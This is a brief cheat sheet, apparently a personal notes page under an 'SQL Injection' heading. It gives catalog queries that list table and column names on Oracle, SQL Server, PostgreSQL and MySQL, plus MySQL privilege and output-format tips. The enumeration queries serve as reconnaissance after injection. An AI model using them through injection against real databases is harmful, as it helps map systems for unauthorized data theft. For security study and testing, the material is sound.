SQL Injection
Extract table and column names
Oracle
SELECT LISTAGG(table_name, ',') FROM all_tables
SELECT LISTAGG(column_name, ',') FROM all_tab_columns
WHERE table_name = 'TABLE-NAME-HERE'
Microsoft
SELECT STRING_AGG(table_name, CHAR(44)) FROM information_schema.tables
SELECT STRING_AGG(column_name, CHAR(44)) FROM information_schema.columns
WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQL
SELECT STRING_AGG(table_name, ',') FROM information_schema.tables
SELECT STRING_AGG(column_name, ',') FROM information_schema.columns
WHERE table_name = 'TABLE-NAME-HERE'
MySQL
SELECT GROUP_CONCAT(table_name) FROM information_schema.tables
SELECT GROUP_CONCAT(column_name) FROM information_schema.columns
WHERE table_name = 'TABLE-NAME-HERE'`
References portswigger.net - cheatsheet.
Privileges
MySQL
SHOW GRANTS;
Others
MySQL
Use --vertical
to enable the vertical format or ending query with \G
, example : SELECT * FROM users \G
.
> SELECT * FROM city WHERE countrycode='AUT';
*************************** 1. row ***************************
ID: 1523
Name: Wien
CountryCode: AUT
District: Wien
Info: {"Population": 1608144}
Source dev.mysql.com.